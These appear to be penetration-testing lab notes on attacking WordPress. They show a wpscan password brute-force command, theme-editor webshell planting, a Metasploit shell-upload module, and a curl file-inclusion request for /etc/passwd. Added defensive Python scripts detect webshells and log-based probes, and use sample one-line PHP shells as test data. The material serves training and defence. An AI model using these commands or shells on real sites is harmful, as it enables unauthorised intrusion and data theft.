
Attacking Wordpress

Login Bruteforce

  • wpscan can be used to bruteforce the login
  • in this example it found two users: admin and doug
  • it supports two kinds of attack:
    • xmlrpc - uses the WordPress API to make login attempts through the /xmlrpc.php page
    • wp-login - standard attack against the login page
  • The xmlrpc method is preferred as it's faster.

login bruteforce

  • sudo wpscan --password-attack xmlrpc -t 20 -U doug -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
    • --password-attack: the attack type to use (xmlrpc or wp-login)
    • -U: a user name, a comma-separated list of users, or a file of users
    • -P: password wordlist file
    • -t: number of threads

Code Execution

Using themes

  • once logged in as admin, go to the Theme Editor under themes
  • edit a .php page in a theme so that it includes the PHP webshell
  • then find the path of that file on the web server (the theme's directory layout may need to be looked up), e.g. /wp-content/themes/twentytwenty/404.php
  • since the file now contains the webshell, commands can be passed to it through the URL:
    • http://blog.inlanefreight.local/wp-content/themes/twentytwenty/404.php?0=ls+/
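From the defending side, both of the changes described above (an edited theme file and a plugin dropped onto the server by an upload-based module) show up as an unexpected change in the wp-content tree. The following is an added example, not code from the original notes: it hashes every .php file under a wp-content directory, diffs the result against a saved baseline, and scans new or modified files for lines that feed request input straight into a command or code execution call. The directory layout, the twentytwenty/404.php sample and the "dropped" plugin are constructed in a temporary directory so the script runs offline.

```python
"""File-integrity and webshell-pattern check for a WordPress wp-content tree.

Added example (not from the original notes). It assumes a wp-content directory
layout under the root you pass in; the sample tree in demo() is constructed in a
temporary directory so the script runs offline.
"""
import hashlib
import os
import re
import tempfile

# PHP functions that turn attacker-controlled input into command or code execution.
# A theme's 404 page has no business calling any of these.
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Request superglobals appearing on the same line as one of those calls.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def hash_php_files(root):
    """Return {relative_path: sha256} for every .php file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(old, new):
    """Compare two hash maps; returns (added, modified, removed) as sorted path lists."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    modified = sorted(p for p in new if p in old and new[p] != old[p])
    return added, modified, removed


def suspicious_php(source):
    """Return (line_number, line) for lines that pass request input into an execution call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DANGEROUS_CALLS.search(line) and REQUEST_INPUT.search(line):
            hits.append((lineno, line.strip()))
    return hits


def audit(root, baseline):
    """Diff the current tree against the baseline and scan changed files for webshell patterns."""
    current = hash_php_files(root)
    added, modified, removed = diff_baseline(baseline, current)
    findings = {}
    for rel in added + modified:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            hits = suspicious_php(fh.read())
        if hits:
            findings[rel] = hits
    return {"added": added, "modified": modified, "removed": removed, "findings": findings}


def demo():
    """Constructed scenario: take a baseline, then tamper with a theme and drop a plugin."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = os.path.join(tmp, "wp-content", "themes", "twentytwenty")
        os.makedirs(theme)
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("<?php get_header(); ?>\n<h1>Not found</h1>\n")
        baseline = hash_php_files(tmp)

        # Simulated tampering: a one-line shell appended to the theme's 404 page
        # (constructed sample matching the pattern the notes describe).
        with open(os.path.join(theme, "404.php"), "a") as fh:
            fh.write("<?php system($_GET[0]); ?>\n")
        # A plugin directory that was not in the baseline, as an upload-based
        # attack leaves behind (constructed sample).
        plugin = os.path.join(tmp, "wp-content", "plugins", "dropped")
        os.makedirs(plugin)
        with open(os.path.join(plugin, "dropped.php"), "w") as fh:
            fh.write("<?php /* Plugin Name: x */ eval($_POST['c']); ?>\n")

        return audit(tmp, baseline)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice the baseline is taken from a known-good deployment and stored off the web host; the "findings" map is only a first-pass heuristic, so every file in "added" or "modified" should be reviewed even when no dangerous call was matched.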

Using metasploit

use exploit/unix/webapp/wp_admin_shell_upload

set username john
set password firebird1
set lhost 10.10.14.15
set rhost 10.129.42.195
set VHOST blog.inlanefreight.local

  • Note: During an assessment, we would want to make every attempt to clean up this artifact from the client system and, regardless of whether we were able to remove it or not, we should list this artifact in our report appendices. At the very least, our report should have an appendix section that lists the following information (more on this in a later module):
    • Exploited systems (hostname/IP and method of exploitation)
    • Compromised users (account name, method of compromise, account type (local or domain))
    • Artifacts created on systems
    • Changes (such as adding a local admin user or modifying group membership)

Using Known Vulnerabilities

  • https://wpscan.com/statistics - WordPress vulnerability statistics
  • Note: We can use the waybackurls tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

mail-masta

  • no longer maintained, but may still be present if it was installed once and forgotten by the devs
  • the pl parameter of count_of_send.php is passed to a file include, so local files on the server can be read:
  • curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
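Both the xmlrpc/wp-login bruteforce described in the Login Bruteforce section and the plugin file-inclusion probe shown here leave a clear trace in the web server's access log. The following added example (not from the original notes) parses Apache/nginx "combined" format lines and raises one alert per source IP that sends more than a threshold of login POSTs inside a sliding window, plus an alert for any request to a plugin path whose query value looks like an absolute path, a traversal sequence or a PHP wrapper. The log lines, the timestamps and the threshold of 10 attempts per 60 seconds are constructed for the example.

```python
"""Detect WordPress login brute force and plugin file-inclusion probes in access logs.

Added example, not part of the original notes. It assumes Apache/nginx
"combined" log format; the log lines in sample_log() are constructed samples.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
LOGIN_ENDPOINTS = {"/xmlrpc.php", "/wp-login.php"}
# Query values naming an absolute path, a traversal sequence, a PHP wrapper or
# /etc/passwd are never legitimate input for a plugin parameter.
LFI_VALUE = re.compile(r"(^/|\.\./|^php://|^file://|/etc/passwd)")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return alerts: login POST bursts per IP inside a sliding window, and LFI probes."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    flagged = set()               # IPs already reported for brute force
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path = rec["ip"], rec["ts"], rec["path"]
        if rec["method"] == "POST" and path in LOGIN_ENDPOINTS:
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:   # drop attempts older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "login_bruteforce", "ip": ip,
                               "endpoint": path, "count": len(q), "ua": rec["ua"]})
        if path.startswith("/wp-content/plugins/"):
            for key, value in rec["query"]:
                if LFI_VALUE.search(value):
                    alerts.append({"type": "plugin_lfi_probe", "ip": ip,
                                   "path": path, "param": key, "value": value})
    return alerts


def sample_log():
    """Constructed access-log lines: 12 xmlrpc POSTs in 22 seconds from one IP,
    one normal visitor, and an inclusion probe against a retired plugin."""
    base = datetime(2023, 10, 10, 12, 0, 0)
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        lines.append(f'10.10.14.15 - - [{ts}] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.8.22"')
    lines.append('192.0.2.7 - - [10/Oct/2023:12:00:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2571 "-" "Mozilla/5.0"')
    lines.append('10.10.14.15 - - [10/Oct/2023:12:01:00 +0000] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1804 "-" "curl/7.88.1"')
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Only the first POST that crosses the threshold produces a brute-force alert for a given IP, which keeps a long wordlist run from flooding the output; the user agent is carried along because wpscan identifies itself by default, but a threshold on request rate is what catches a renamed client. The same plugin-path check also surfaces requests to plugin directories that are no longer installed, which is exactly the leftover-plugin case the note above describes.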

wpDiscuz

  • a public exploit exists for v7.0.4 - https://www.exploit-db.com/exploits/49967